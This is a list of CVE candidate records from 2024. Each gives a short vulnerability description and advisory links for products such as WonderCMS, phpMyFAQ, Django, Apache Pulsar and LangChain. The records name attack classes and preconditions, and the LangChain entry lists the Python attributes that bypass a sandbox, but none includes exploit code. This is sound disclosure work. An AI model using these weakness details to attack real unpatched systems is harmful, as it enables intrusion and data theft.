CVE 2024 27561 Candidate A Server-Side Request Forgery (SSRF) in the installUpdateThemePluginAction function of WonderCMS v3.1.3 allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the installThemePlugin parameter. MISC:https://github.com/zer0yu/CVE_Request/blob/master/WonderCMS/wondercms_installUpdateThemePluginAction_plugins.md Assigned (20240226)
CVE 2024 27559 Candidate Stupid Simple CMS v1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /save_settings.php MISC:https://github.com/kilooooo/cms/blob/main/1.md Assigned (20240226)
CVE 2024 27558 Candidate Stupid Simple CMS 1.2.4 is vulnerable to Cross Site Scripting (XSS) within the blog title of the settings. MISC:https://github.com/kilooooo/cms/blob/main/2.md Assigned (20240226)
CVE 2024 2754 Candidate A vulnerability classified as critical has been found in SourceCodester Complete E-Commerce Site 1.0. Affected is an unknown function of the file /admin/users_photo.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257544. MISC:VDB-257544 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257544 | MISC:VDB-257544 | SourceCodester Complete E-Commerce Site users_photo.php unrestricted upload | URL:https://vuldb.com/?id.257544 | MISC:https://github.com/wkeyi0x1/vul-report/issues/4 | URL:https://github.com/wkeyi0x1/vul-report/issues/4 Assigned (20240321)
CVE 2024 27517 Candidate Webasyst 2.9.9 has a Cross-Site Scripting (XSS) vulnerability, Attackers can create blogs containing malicious code after gaining blog permissions. MISC:https://github.com/webasyst/webasyst-framework/issues/377 Assigned (20240226)
CVE 2024 27516 Candidate Server-Side Template Injection (SSTI) vulnerability in livehelperchat before 4.34v, allows remote attackers to execute arbitrary code and obtain sensitive information via the search parameter in lhc_web/modules/lhfaq/faqweight.php. MISC:https://github.com/LiveHelperChat/livehelperchat/commit/a61d231526a36d4a7d8cc957914799ee1f9db0ab | MISC:https://github.com/LiveHelperChat/livehelperchat/issues/2054 Assigned (20240226)
CVE 2024 27515 Candidate Osclass 5.1.2 is vulnerable to SQL Injection. MISC:https://github.com/mindstellar/Osclass/issues/495 Assigned (20240226)
CVE 2024 27508 Candidate Atheme 7.2.12 contains a memory leak vulnerability in /atheme/src/crypto-benchmark/main.c. MISC:https://github.com/LuMingYinDetect/Atheme_defects/blob/main/Atheme_detect_1.md Assigned (20240226)
CVE 2024 27507 Candidate libLAS 1.8.1 contains a memory leak vulnerability in /libLAS/apps/ts2las.cpp. FEDORA:FEDORA-2024-0a0b1533f7 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2B6GZQ3WUVFNAAWFQJAQY7UM4OH5TA/ | FEDORA:FEDORA-2024-34301311f8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WVOY7E2QWQRVXZTJGI7Z4KXGSU6BGEKH/ | FEDORA:FEDORA-2024-ef8c8a8b37 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3QRV2D4GYUZNZRJHVGFSYSOSZLCETI4E/ | MISC:https://github.com/LuMingYinDetect/libLAS_defects/blob/main/libLAS_detect_1.md Assigned (20240226)
CVE 2024 27499 Candidate Bagisto v1.5.1 is vulnerable for Cross site scripting(XSS) via png file upload vulnerability in product review option. MISC:https://github.com/Ek-Saini/security/blob/main/xss-bagisto-v1.5.1 | MISC:https://github.com/bagisto/bagisto/pull/9474 Assigned (20240226)
CVE 2024 27497 Candidate Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file. MISC:https://warp-desk-89d.notion.site/Linksys-E-2000-efcd532d8dcf4710a4af13fca131a5b8 Assigned (20240226)
CVE 2024 2748 Candidate A Cross Site Request Forgery vulnerability was identified in GitHub Enterprise Server that allowed an attacker to execute unauthorized actions on behalf of an unsuspecting user. A mitigating factor is that user interaction is required. This vulnerability affected GitHub Enterprise Server 3.12.0 and was fixed in versions 3.12.1. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes/#3.12.1 | URL:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes/#3.12.1 Assigned (20240320)
CVE 2024 27456 Candidate rack-cors (aka Rack CORS Middleware) 2.0.1 has 0666 permissions for the .rb files. MISC:https://github.com/cyu/rack-cors/issues/274 Assigned (20240226)
CVE 2024 27455 Candidate In the Bentley ALIM Web application, certain configuration settings can cause exposure of a user's ALIM session token when the user attempts to download files. This is fixed in Assetwise ALIM Web 23.00.02.03 and Assetwise Information Integrity Server 23.00.04.04. MISC:https://www.bentley.com/advisories/be-2024-0001/ Assigned (20240226)
CVE 2024 27454 Candidate orjson.loads in orjson before 3.9.15 does not limit recursion for deeply nested JSON documents. MISC:https://github.com/ijl/orjson/blob/master/CHANGELOG.md#3915 | MISC:https://github.com/ijl/orjson/commit/b0e4d2c06ce06c6e63981bf0276e4b7c74e5845e | MISC:https://github.com/ijl/orjson/issues/458 | MISC:https://monicz.dev/CVE-2024-27454 Assigned (20240226)
CVE 2024 27447 Candidate pretix before 2024.1.1 mishandles file validation. MISC:https://github.com/pretix/pretix/compare/v2023.10.2...v2024.1.1 Assigned (20240226)
CVE 2024 27444 Candidate langchain_experimental (aka LangChain Experimental) in LangChain before 0.1.8 allows an attacker to bypass the CVE-2023-44467 fix and execute arbitrary code via the __import__, __subclasses__, __builtins__, __globals__, __getattribute__, __bases__, __mro__, or __base__ attribute in Python code. These are not prohibited by pal_chain/base.py. MISC:https://github.com/langchain-ai/langchain/commit/de9a6cdf163ed00adaf2e559203ed0a9ca2f1de7 Assigned (20240226)
CVE 2024 27440 Candidate The Toyoko Inn official App for iOS versions prior to 1.13.0 and Toyoko Inn official App for Android versions prior 1.3.14 don't properly verify server certificates, which allows a man-in-the-middle attacker to spoof servers and obtain sensitive information via a crafted certificate. MISC:https://apps.apple.com/jp/app/%E3%83%9B%E3%83%86%E3%83%AB%E6%9D%B1%E6%A8%AAinn-%E6%9D%B1%E6%A8%AA%E3%82%A4%E3%83%B3-%E5%85%AC%E5%BC%8F%E3%82%A2%E3%83%97%E3%83%AA/id1439388270 | URL:https://apps.apple.com/jp/app/%E3%83%9B%E3%83%86%E3%83%AB%E6%9D%B1%E6%A8%AAinn-%E6%9D%B1%E6%A8%AA%E3%82%A4%E3%83%B3-%E5%85%AC%E5%BC%8F%E3%82%A2%E3%83%97%E3%83%AA/id1439388270 | MISC:https://jvn.jp/en/jp/JVN52919306/ | URL:https://jvn.jp/en/jp/JVN52919306/ | MISC:https://play.google.com/store/apps/details?id=com.toyoko_inn.toyokoandroid | URL:https://play.google.com/store/apps/details?id=com.toyoko_inn.toyokoandroid Assigned (20240226)
CVE 2024 27439 Candidate An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket. This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series. Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected. Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue. MISC:https://lists.apache.org/thread/o825rvjjtmz3qv21ps5k7m2w9193g1lo | URL:https://lists.apache.org/thread/o825rvjjtmz3qv21ps5k7m2w9193g1lo Assigned (20240225)
CVE 2024 27438 Candidate Download of Code Without Integrity Check vulnerability in Apache Doris. The jdbc driver files used for JDBC catalog is not checked and may resulting in remote command execution. Once the attacker is authorized to create a JDBC catalog, he/she can use arbitrary driver jar file with unchecked code snippet. This code snippet will be run when catalog is initializing without any check. This issue affects Apache Doris: from 1.2.0 through 2.0.4. Users are recommended to upgrade to version 2.0.5 or 2.1.x, which fixes the issue. MISC:https://lists.apache.org/thread/h95h82b0svlnwcg6c2xq4b08j6gwgczh | URL:https://lists.apache.org/thread/h95h82b0svlnwcg6c2xq4b08j6gwgczh Assigned (20240225)
CVE 2024 2742 Candidate Operating system command injection vulnerability in Planet IGS-4215-16T2S, affecting firmware version 1.305b210528. An authenticated attacker could execute arbitrary code on the remote host by exploiting IP address functionality. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s Assigned (20240320)
CVE 2024 2741 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Planet IGS-4215-16T2S, affecting firmware version 1.305b210528. This vulnerability could allow a remote attacker to trick some authenticated users into performing actions in their session, such as adding or updating accounts through the Switch web interface. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s Assigned (20240320)
CVE 2024 2740 Candidate Information exposure vulnerability in Planet IGS-4215-16T2S, affecting firmware version 1.305b210528. This vulnerability could allow a remote attacker to access some administrative resources due to lack of proper management of the Switch web interface. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-planet-igs-4215-16t2s Assigned (20240320)
CVE 2024 27359 Candidate Certain WithSecure products allow a Denial of Service because the engine scanner can go into an infinite loop when processing an archive file. This affects WithSecure Client Security 15, WithSecure Server Security 15, WithSecure Email and Server Security 15, WithSecure Elements Endpoint Protection 17 and later, WithSecure Client Security for Mac 15, WithSecure Elements Endpoint Protection for Mac 17 and later, WithSecure Linux Security 64 12.0, WithSecure Linux Protection 12.0, and WithSecure Atlant 1.0.35-1. MISC:https://www.withsecure.com/en/support/security-advisories/cve-2034-n1 Assigned (20240225)
CVE 2024 27356 Candidate An issue was discovered on certain GL-iNet devices. Attackers can download files such as logs via commands, potentially obtaining critical user information. This affects MT6000 4.5.5, XE3000 4.4.4, X3000 4.4.5, MT3000 4.5.0, MT2500 4.5.0, AXT1800 4.5.0, AX1800 4.5.0, A1300 4.5.0, S200 4.1.4-0300, X750 4.3.7, SFT1200 4.3.7, XE300 4.3.7, MT1300 4.3.10, AR750 4.3.10, AR750S 4.3.10, AR300M 4.3.10, AR300M16 4.3.10, B1300 4.3.10, MT300N-v2 4.3.10, X300B 3.217, S1300 3.216, SF1200 3.216, MV1000 3.216, N300 3.216, B2200 3.216, and X1200 3.203. MISC:https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md | MISC:https://gl-inet.com Assigned (20240225)
CVE 2024 27355 Candidate An issue was discovered in phpseclib 1.x before 1.0.23, 2.x before 2.0.47, and 3.x before 3.0.36. When processing the ASN.1 object identifier of a certificate, a sub identifier may be provided that leads to a denial of service (CPU consumption for decodeOID). MISC:https://gist.github.com/katzj/ee72f3c2a00590812b2ea3c0c8890e0b | MISC:https://github.com/phpseclib/phpseclib/blob/978d081fe50ff92879c50ff143c62a143edb0117/phpseclib/File/ASN1.php#L1129 | MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3749-1] phpseclib security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00002.html | MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3750-1] php-phpseclib security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00003.html Assigned (20240225)
CVE 2024 27354 Candidate An issue was discovered in phpseclib 1.x before 1.0.23, 2.x before 2.0.47, and 3.x before 3.0.36. An attacker can construct a malformed certificate containing an extremely large prime to cause a denial of service (CPU consumption for an isPrime primality check). NOTE: this issue was introduced when attempting to fix CVE-2023-27560. MISC:https://gist.github.com/katzj/ee72f3c2a00590812b2ea3c0c8890e0b | MISC:https://github.com/phpseclib/phpseclib/blob/master/phpseclib/Math/PrimeField.php#L49 | MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3749-1] phpseclib security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00002.html | MLIST:[debian-lts-announce] 20240305 [SECURITY] [DLA 3750-1] php-phpseclib security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00003.html Assigned (20240225)
CVE 2024 27351 Candidate In Django 3.2 before 3.2.25, 4.2 before 4.2.11, and 5.0 before 5.0.3, the django.utils.text.Truncator.words() method (with html=True) and the truncatewords_html template filter are subject to a potential regular expression denial-of-service attack via a crafted string. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232 and CVE-2023-43665. CONFIRM:https://www.djangoproject.com/weblog/2024/mar/04/security-releases/ | MISC:https://docs.djangoproject.com/en/5.0/releases/security/ | MISC:https://groups.google.com/forum/#!forum/django-announce Assigned (20240225)
CVE 2024 27350 Candidate Amazon Fire OS 7 before 7.6.6.9 and 8 before 8.1.0.3 allows Fire TV applications to establish local ADB (Android Debug Bridge) connections. NOTE: some third parties dispute whether this has security relevance, because an ADB connection is only possible after the (non-default) ADB Debugging option is enabled, and after the initiator of that specific connection attempt has been approved via a full-screen prompt. MISC:https://developer.amazon.com/docs/fire-tv/fire-os-overview.html | MISC:https://news.ycombinator.com/item?id=39496861 | MISC:https://www.aftvnews.com/amazon-blocks-long-running-fire-tv-capability-breaking-popular-apps-with-no-warning-and-giving-developers-the-runaround/ Assigned (20240225)
CVE 2024 2732 Candidate The Themify Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'themify_post_slider shortcode in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3056453/themify-shortcodes/trunk/includes/themify-shortcodes.php | URL:https://plugins.trac.wordpress.org/changeset/3056453/themify-shortcodes/trunk/includes/themify-shortcodes.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0aeb63e7-a24d-4d76-a8c7-f082dad87a55?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0aeb63e7-a24d-4d76-a8c7-f082dad87a55?source=cve Assigned (20240320)
CVE 2024 27319 Candidate Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy. MISC:https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287 | URL:https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287 Assigned (20240223)
CVE 2024 27318 Candidate Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. The vulnerability occurs as a bypass for the patch added for CVE-2022-25882. MISC:https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20 | URL:https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20 | MISC:https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479 | URL:https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479 Assigned (20240223)
CVE 2024 27317 Candidate In Pulsar Functions Worker, authenticated users can upload functions in jar or nar files. These files, essentially zip files, are extracted by the Functions Worker. However, if a malicious file is uploaded, it could exploit a directory traversal vulnerability. This occurs when the filenames in the zip files, which aren't properly validated, contain special elements like "..", altering the directory path. This could allow an attacker to create or modify files outside of the designated extraction directory, potentially influencing system behavior. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. MISC:https://lists.apache.org/thread/ct9xmvlf7lompc1pxvlsb60qstfsm9po | URL:https://lists.apache.org/thread/ct9xmvlf7lompc1pxvlsb60qstfsm9po | MISC:https://pulsar.apache.org/security/CVE-2024-27317/ | URL:https://pulsar.apache.org/security/CVE-2024-27317/ Assigned (20240223)
CVE 2024 27315 Candidate An authenticated user with privileges to create Alerts on Alerts & Reports has the capability to generate a specially crafted SQL statement that triggers an error on the database. This error is not properly handled by Apache Superset and may inadvertently surface in the error log of the Alert exposing possibly sensitive data. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue. MISC:https://lists.apache.org/thread/qcwbx7q2s3ynsd405895bx3wcwq32j7z | URL:https://lists.apache.org/thread/qcwbx7q2s3ynsd405895bx3wcwq32j7z | MLIST:[oss-security] 20240228 CVE-2024-27315: Apache Superset: Improper error handling on alerts | URL:http://www.openwall.com/lists/oss-security/2024/02/28/3 Assigned (20240223)
CVE 2024 27308 Candidate Mio is a Metal I/O library for Rust. When using named pipes on Windows, mio will under some circumstances return invalid tokens that correspond to named pipes that have already been deregistered from the mio registry. The impact of this vulnerability depends on how mio is used. For some applications, invalid tokens may be ignored or cause a warning or a crash. On the other hand, for applications that store pointers in the tokens, this vulnerability may result in a use-after-free. For users of Tokio, this vulnerability is serious and can result in a use-after-free in Tokio. The vulnerability is Windows-specific, and can only happen if you are using named pipes. Other IO resources are not affected. This vulnerability has been fixed in mio v0.8.11. All versions of mio between v0.7.2 and v0.8.10 are vulnerable. Tokio is vulnerable when you are using a vulnerable version of mio AND you are using at least Tokio v1.30.0. Versions of Tokio prior to v1.30.0 will ignore invalid tokens, so they are not vulnerable. Vulnerable libraries that use mio can work around this issue by detecting and ignoring invalid tokens. MISC:https://github.com/tokio-rs/mio/commit/90d4fe00df870acd3d38f3dc4face9aacab8fbb9 | URL:https://github.com/tokio-rs/mio/commit/90d4fe00df870acd3d38f3dc4face9aacab8fbb9 | MISC:https://github.com/tokio-rs/mio/pull/1760 | URL:https://github.com/tokio-rs/mio/pull/1760 | MISC:https://github.com/tokio-rs/mio/security/advisories/GHSA-r8w9-5wcg-vfj7 | URL:https://github.com/tokio-rs/mio/security/advisories/GHSA-r8w9-5wcg-vfj7 | MISC:https://github.com/tokio-rs/tokio/issues/6369 | URL:https://github.com/tokio-rs/tokio/issues/6369 Assigned (20240222)
CVE 2024 27307 Candidate JSONata is a JSON query and transformation language. Starting in version 1.4.0 and prior to version 1.8.7 and 2.0.4, a malicious expression can use the transform operator to override properties on the `Object` constructor and prototype. This may lead to denial of service, remote code execution or other unexpected behavior in applications that evaluate user-provided JSONata expressions. This issue has been fixed in JSONata versions 1.8.7 and 2.0.4. Applications that evaluate user-provided expressions should update ASAP to prevent exploitation. As a workaround, one may apply the patch manually. MISC:https://github.com/jsonata-js/jsonata/commit/1d579dbe99c19fbe509f5ba2c6db7959b0d456d1 | URL:https://github.com/jsonata-js/jsonata/commit/1d579dbe99c19fbe509f5ba2c6db7959b0d456d1 | MISC:https://github.com/jsonata-js/jsonata/commit/335d38f6278e96c908b24183f1c9c90afc8ae00c | URL:https://github.com/jsonata-js/jsonata/commit/335d38f6278e96c908b24183f1c9c90afc8ae00c | MISC:https://github.com/jsonata-js/jsonata/commit/c907b5e517bb718015fcbd993d742ba6202f2be2 | URL:https://github.com/jsonata-js/jsonata/commit/c907b5e517bb718015fcbd993d742ba6202f2be2 | MISC:https://github.com/jsonata-js/jsonata/releases/tag/v2.0.4 | URL:https://github.com/jsonata-js/jsonata/releases/tag/v2.0.4 | MISC:https://github.com/jsonata-js/jsonata/security/advisories/GHSA-fqg8-vfv7-8fj8 | URL:https://github.com/jsonata-js/jsonata/security/advisories/GHSA-fqg8-vfv7-8fj8 Assigned (20240222)
CVE 2024 27305 Candidate aiosmtpd is a reimplementation of the Python stdlib smtpd.py based on asyncio. aiosmtpd is vulnerable to inbound SMTP smuggling. SMTP smuggling is a novel vulnerability based on not so novel interpretation differences of the SMTP protocol. By exploiting SMTP smuggling, an attacker may send smuggle/spoof e-mails with fake sender addresses, allowing advanced phishing attacks. This issue is also existed in other SMTP software like Postfix. With the right SMTP server constellation, an attacker can send spoofed e-mails to inbound/receiving aiosmtpd instances. This issue has been addressed in version 1.4.5. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/aio-libs/aiosmtpd/commit/24b6c79c8921cf1800e27ca144f4f37023982bbb | URL:https://github.com/aio-libs/aiosmtpd/commit/24b6c79c8921cf1800e27ca144f4f37023982bbb | MISC:https://github.com/aio-libs/aiosmtpd/security/advisories/GHSA-pr2m-px7j-xg65 | URL:https://github.com/aio-libs/aiosmtpd/security/advisories/GHSA-pr2m-px7j-xg65 | MISC:https://www.postfix.org/smtp-smuggling.html | URL:https://www.postfix.org/smtp-smuggling.html Assigned (20240222)
CVE 2024 27304 Candidate pgx is a PostgreSQL driver and toolkit for Go. SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control. The problem is resolved in v4.18.2 and v5.5.4. As a workaround, reject user input large enough to cause a single query or bind message to exceed 4 GB in size. MISC:https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007 | URL:https://github.com/jackc/pgproto3/commit/945c2126f6db8f3bea7eeebe307c01fe92bca007 | MISC:https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8 | URL:https://github.com/jackc/pgproto3/security/advisories/GHSA-7jwh-3vrq-q3m8 | MISC:https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4 | URL:https://github.com/jackc/pgx/commit/adbb38f298c76e283ffc7c7a3f571036fea47fd4 | MISC:https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8 | URL:https://github.com/jackc/pgx/commit/c543134753a0c5d22881c12404025724cb05ffd8 | MISC:https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df | URL:https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df | MISC:https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv | URL:https://github.com/jackc/pgx/security/advisories/GHSA-mrww-27vc-gghv Assigned (20240222)
CVE 2024 27303 Candidate electron-builder is a solution to package and build a ready for distribution Electron, Proton Native app for macOS, Windows and Linux. A vulnerability that only affects eletron-builder prior to 24.13.2 in Windows, the NSIS installer makes a system call to open cmd.exe via NSExec in the `.nsh` installer script. NSExec by default searches the current directory of where the installer is located before searching `PATH`. This means that if an attacker can place a malicious executable file named cmd.exe in the same folder as the installer, the installer will run the malicious file. Version 24.13.2 fixes this issue. No known workaround exists. The code executes at the installer-level before the app is present on the system, so there's no way to check if it exists in a current installer. MISC:https://github.com/electron-userland/electron-builder/commit/8f4acff3c2d45c1cb07779bb3fe79644408ee387 | URL:https://github.com/electron-userland/electron-builder/commit/8f4acff3c2d45c1cb07779bb3fe79644408ee387 | MISC:https://github.com/electron-userland/electron-builder/pull/8059 | URL:https://github.com/electron-userland/electron-builder/pull/8059 | MISC:https://github.com/electron-userland/electron-builder/security/advisories/GHSA-r4pf-3v7r-hh55 | URL:https://github.com/electron-userland/electron-builder/security/advisories/GHSA-r4pf-3v7r-hh55 Assigned (20240222)
CVE 2024 27302 Candidate go-zero is a web and rpc framework. Go-zero allows user to specify a CORS Filter with a configurable allows param - which is an array of domains allowed in CORS policy. However, the `isOriginAllowed` uses `strings.HasSuffix` to check the origin, which leads to bypass via a malicious domain. This vulnerability is capable of breaking CORS policy and thus allowing any page to make requests and/or retrieve data on behalf of other users. Version 1.4.4 fixes this issue. MISC:https://github.com/zeromicro/go-zero/commit/d9d79e930dff6218a873f4f02115df61c38b15db | URL:https://github.com/zeromicro/go-zero/commit/d9d79e930dff6218a873f4f02115df61c38b15db | MISC:https://github.com/zeromicro/go-zero/security/advisories/GHSA-fgxv-gw55-r5fq | URL:https://github.com/zeromicro/go-zero/security/advisories/GHSA-fgxv-gw55-r5fq Assigned (20240222)
CVE 2024 27301 Candidate Support App is an opensource application specialized in managing Apple devices. It's possible to abuse a vulnerability inside the postinstall installer script to make the installer execute arbitrary code as root. The cause of the vulnerability is the fact that the shebang `#!/bin/zsh` is being used. When the installer is executed it asks for the users password to be executed as root. However, it'll still be using the $HOME of the user and therefore loading the file `$HOME/.zshenv` when the `postinstall` script is executed. An attacker could add malicious code to `$HOME/.zshenv` and it will be executed when the app is installed. An attacker may leverage this vulnerability to escalate privilege on the system. This issue has been addressed in version 2.5.1 Rev 2. All users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/root3nl/SupportApp/commit/e866b2aa4028f6a982977f462c0f7550d952c5d0 | URL:https://github.com/root3nl/SupportApp/commit/e866b2aa4028f6a982977f462c0f7550d952c5d0 | MISC:https://github.com/root3nl/SupportApp/security/advisories/GHSA-jr78-247f-rhqc | URL:https://github.com/root3nl/SupportApp/security/advisories/GHSA-jr78-247f-rhqc Assigned (20240222)
CVE 2024 27300 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. The `email` field in phpMyFAQ's user control panel page is vulnerable to stored XSS attacks due to the inadequacy of PHP's `FILTER_VALIDATE_EMAIL` function, which only validates the email format, not its content. This vulnerability enables an attacker to execute arbitrary client-side JavaScript within the context of another user's phpMyFAQ session. This vulnerability is fixed in 3.2.6. MISC:https://github.com/thorsten/phpMyFAQ/commit/09336b0ff0e0a04aa0c97c5975651af4769d2459 | URL:https://github.com/thorsten/phpMyFAQ/commit/09336b0ff0e0a04aa0c97c5975651af4769d2459 | MISC:https://github.com/thorsten/phpMyFAQ/commit/de90315c9bd4ead5fe6ba5586f6b016843aa8209 | URL:https://github.com/thorsten/phpMyFAQ/commit/de90315c9bd4ead5fe6ba5586f6b016843aa8209 | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-q7g6-xfh2-vhpx | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-q7g6-xfh2-vhpx Assigned (20240222)
CVE 2024 27299 Candidate phpMyFAQ is an open source FAQ web application for PHP 8.1+ and MySQL, PostgreSQL and other databases. A SQL injection vulnerability has been discovered in the the "Add News" functionality due to improper escaping of the email address. This allows any authenticated user with the rights to add/edit FAQ news to exploit this vulnerability to exfiltrate data, take over accounts and in some cases, even achieve RCE. The vulnerable field lies in the `authorEmail` field which uses PHP's `FILTER_VALIDATE_EMAIL` filter. This filter is insufficient in protecting against SQL injection attacks and should still be properly escaped. However, in this version of phpMyFAQ (3.2.5), this field is not escaped properly can be used together with other fields to fully exploit the SQL injection vulnerability. This vulnerability is fixed in 3.2.6. MISC:https://drive.google.com/drive/folders/1BFL8GHIBxSUxu0TneYf66KjFA0A4RZga?usp=sharing | URL:https://drive.google.com/drive/folders/1BFL8GHIBxSUxu0TneYf66KjFA0A4RZga?usp=sharing | MISC:https://github.com/thorsten/phpMyFAQ/commit/1b68a5f89fb65996c56285fa636b818de8608011 | URL:https://github.com/thorsten/phpMyFAQ/commit/1b68a5f89fb65996c56285fa636b818de8608011 | MISC:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-qgxx-4xv5-6hcw | URL:https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-qgxx-4xv5-6hcw Assigned (20240222)
CVE 2024 27298 Candidate parse-server is a Parse Server for Node.js / Express. This vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database. The vulnerability has been fixed in 6.5.0 and 7.0.0-alpha.20. MISC:https://github.com/parse-community/parse-server/commit/a6e654943536932904a69b51e513507fcf90a504 | URL:https://github.com/parse-community/parse-server/commit/a6e654943536932904a69b51e513507fcf90a504 | MISC:https://github.com/parse-community/parse-server/commit/cbefe770a7260b54748a058b8a7389937dc35833 | URL:https://github.com/parse-community/parse-server/commit/cbefe770a7260b54748a058b8a7389937dc35833 | MISC:https://github.com/parse-community/parse-server/releases/tag/6.5.0 | URL:https://github.com/parse-community/parse-server/releases/tag/6.5.0 | MISC:https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.20 | URL:https://github.com/parse-community/parse-server/releases/tag/7.0.0-alpha.20 | MISC:https://github.com/parse-community/parse-server/security/advisories/GHSA-6927-3vr9-fxf2 | URL:https://github.com/parse-community/parse-server/security/advisories/GHSA-6927-3vr9-fxf2 Assigned (20240222)
CVE 2024 27297 Candidate Nix is a package manager for Linux and other Unix systems. A fixed-output derivations on Linux can send file descriptors to files in the Nix store to another program running on the host (or another fixed-output derivation) via Unix domain sockets in the abstract namespace. This allows to modify the output of the derivation, after Nix has registered the path as "valid" and immutable in the Nix database. In particular, this allows the output of fixed-output derivations to be modified from their expected content. This issue has been addressed in versions 2.3.18 2.18.2 2.19.4 and 2.20.5. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/NixOS/nix/commit/f8170ce9f119e5e6724eb81ff1b5a2d4c0024000 | URL:https://github.com/NixOS/nix/commit/f8170ce9f119e5e6724eb81ff1b5a2d4c0024000 | MISC:https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37 | URL:https://github.com/NixOS/nix/security/advisories/GHSA-2ffj-w4mj-pg37 | MISC:https://hackmd.io/03UGerewRcy3db44JQoWvw | URL:https://hackmd.io/03UGerewRcy3db44JQoWvw Assigned (20240222)
